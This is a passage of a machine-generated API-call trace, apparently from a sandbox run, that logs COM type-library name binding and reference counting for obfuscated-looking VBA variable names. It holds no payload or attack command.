[0069.575] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.575] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zcAXXAU", lHashVal=0x100522, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.575] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.575] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.575] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zcAXXAU", lHashVal=0x100522, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.575] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.575] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.575] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zcAXXAU", lHashVal=0x100522, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.576] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.576] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.576] IUnknown:Release (This=0x665ba50) returned 0xd [0069.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87019e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_zcAXXAU") returned 15 [0069.576] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zcAXXAU", lHashVal=0x100522, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0) returned 0x0 [0069.576] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8103a | out: _Dst=0x144ec0) returned 0x0 [0069.576] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mBcQDQwA", lHashVal=0x10aab8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8108a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mBcQDQwA") returned 9 [0069.576] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mBcQDQwA", lHashVal=0x10aab8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8108a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mBcQDQwA") returned 9 [0069.576] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mBcQDQwA", lHashVal=0x10aab8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.576] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mBcQDQwA") returned 0x10aab8 [0069.576] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="mBcQDQwA" | out: _Dst="mBcQDQwA") returned 0x0 [0069.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="mBcQDQwA") returned 9 [0069.576] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.576] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mBcQDQwA", lHashVal=0x10aab8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.576] IUnknown:Release (This=0x665ba50) returned 0xd [0069.576] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.576] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mBcQDQwA", lHashVal=0x10aab8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.576] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.577] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.577] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mBcQDQwA", lHashVal=0x10aab8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.577] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.577] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.577] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mBcQDQwA", lHashVal=0x10aab8, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.577] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8108a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="mBcQDQwA") returned 9 [0069.577] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mBcQDQwA", lHashVal=0x10aab8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.577] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.577] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8108a | out: _Dst=0x67c2d40) returned 0x0 [0069.577] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mBcQDQwA") returned 0x108241 [0069.577] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="cUDAAxZ", cchCount1=-1, lpString2="_B_var_mBcQDQwA", cchCount2=-1) returned 3 [0069.577] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_mBcQDQwA" | out: _Dst="_B_var_mBcQDQwA") returned 0x0 [0069.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_mBcQDQwA") returned 16 [0069.577] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.577] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mBcQDQwA", lHashVal=0x108241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.577] IUnknown:Release (This=0x665ba50) returned 0xd [0069.577] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.577] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mBcQDQwA", lHashVal=0x108241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.577] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.577] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.577] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mBcQDQwA", lHashVal=0x108241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.577] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.577] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.577] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mBcQDQwA", lHashVal=0x108241, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.577] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.577] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.578] IUnknown:Release (This=0x665ba50) returned 0xd [0069.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8701ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_mBcQDQwA") returned 16 [0069.578] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mBcQDQwA", lHashVal=0x108241, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x44005100000000, pDummy=0x0) returned 0x0 [0069.578] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8108a | out: _Dst=0x144ec0) returned 0x0 [0069.578] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mQQDkB", lHashVal=0x10f1ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81062, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQQDkB") returned 7 [0069.578] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mQQDkB", lHashVal=0x10f1ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81062, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQQDkB") returned 7 [0069.578] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mQQDkB", lHashVal=0x10f1ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.578] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQQDkB") returned 0x10f1ad [0069.578] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="mQQDkB" | out: _Dst="mQQDkB") returned 0x0 [0069.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="mQQDkB") returned 7 [0069.578] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.578] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mQQDkB", lHashVal=0x10f1ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.578] IUnknown:Release (This=0x665ba50) returned 0xd [0069.578] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.579] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mQQDkB", lHashVal=0x10f1ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.579] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.579] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.579] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mQQDkB", lHashVal=0x10f1ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.579] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.579] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.579] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mQQDkB", lHashVal=0x10f1ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.579] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81062, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="mQQDkB") returned 7 [0069.579] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mQQDkB", lHashVal=0x10f1ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.579] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.579] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81062 | out: _Dst=0x67c2d40) returned 0x0 [0069.579] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mQQDkB") returned 0x106c17 [0069.579] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_mQQDkB" | out: _Dst="_B_var_mQQDkB") returned 0x0 [0069.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_mQQDkB") returned 14 [0069.579] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.579] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mQQDkB", lHashVal=0x106c17, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.579] IUnknown:Release (This=0x665ba50) returned 0xd [0069.579] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.579] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mQQDkB", lHashVal=0x106c17, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.579] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.579] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.579] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mQQDkB", lHashVal=0x106c17, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.579] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.579] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.579] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mQQDkB", lHashVal=0x106c17, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.579] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.579] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.580] IUnknown:Release (This=0x665ba50) returned 0xd [0069.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8701fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_mQQDkB") returned 14 [0069.580] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mQQDkB", lHashVal=0x106c17, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6b004400000000, pDummy=0x0) returned 0x0 [0069.580] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81062 | out: _Dst=0x144ec0) returned 0x0 [0069.580] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zZAGAoc", lHashVal=0x107234, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810de, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zZAGAoc") returned 8 [0069.580] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zZAGAoc", lHashVal=0x107234, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810de, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zZAGAoc") returned 8 [0069.580] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zZAGAoc", lHashVal=0x107234, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.580] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zZAGAoc") returned 0x107234 [0069.580] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zZAGAoc" | out: _Dst="zZAGAoc") returned 0x0 [0069.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zZAGAoc") returned 8 [0069.580] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.580] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zZAGAoc", lHashVal=0x107234, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.580] IUnknown:Release (This=0x665ba50) returned 0xd [0069.580] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.580] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zZAGAoc", lHashVal=0x107234, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.580] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.580] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.580] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zZAGAoc", lHashVal=0x107234, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.580] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.580] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.581] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zZAGAoc", lHashVal=0x107234, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.581] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b810de, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zZAGAoc") returned 8 [0069.581] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zZAGAoc", lHashVal=0x107234, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.581] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.581] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b810de | out: _Dst=0x67c2d40) returned 0x0 [0069.581] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zZAGAoc") returned 0x1075b8 [0069.581] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zZAGAoc" | out: _Dst="_B_var_zZAGAoc") returned 0x0 [0069.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zZAGAoc") returned 15 [0069.581] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.581] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zZAGAoc", lHashVal=0x1075b8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.581] IUnknown:Release (This=0x665ba50) returned 0xd [0069.581] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.581] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zZAGAoc", lHashVal=0x1075b8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.581] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.581] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.581] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zZAGAoc", lHashVal=0x1075b8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.581] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.581] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.581] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zZAGAoc", lHashVal=0x1075b8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.581] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.581] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.581] IUnknown:Release (This=0x665ba50) returned 0xd [0069.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87022e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_zZAGAoc") returned 15 [0069.581] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zZAGAoc", lHashVal=0x1075b8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.581] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b810de | out: _Dst=0x144ec0) returned 0x0 [0069.582] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jAAAAA", lHashVal=0x102298, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81106, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAAA") returned 7 [0069.582] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jAAAAA", lHashVal=0x102298, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81106, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAAA") returned 7 [0069.582] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jAAAAA", lHashVal=0x102298, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.582] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAAAAA") returned 0x102298 [0069.582] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jAAAAA" | out: _Dst="jAAAAA") returned 0x0 [0069.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jAAAAA") returned 7 [0069.582] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.582] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jAAAAA", lHashVal=0x102298, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.582] IUnknown:Release (This=0x665ba50) returned 0xd [0069.582] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.582] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jAAAAA", lHashVal=0x102298, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.582] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.582] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.582] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jAAAAA", lHashVal=0x102298, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.582] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.582] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.582] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jAAAAA", lHashVal=0x102298, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.582] IUnknown:Release (This=0x665b4b0) returned 0x4 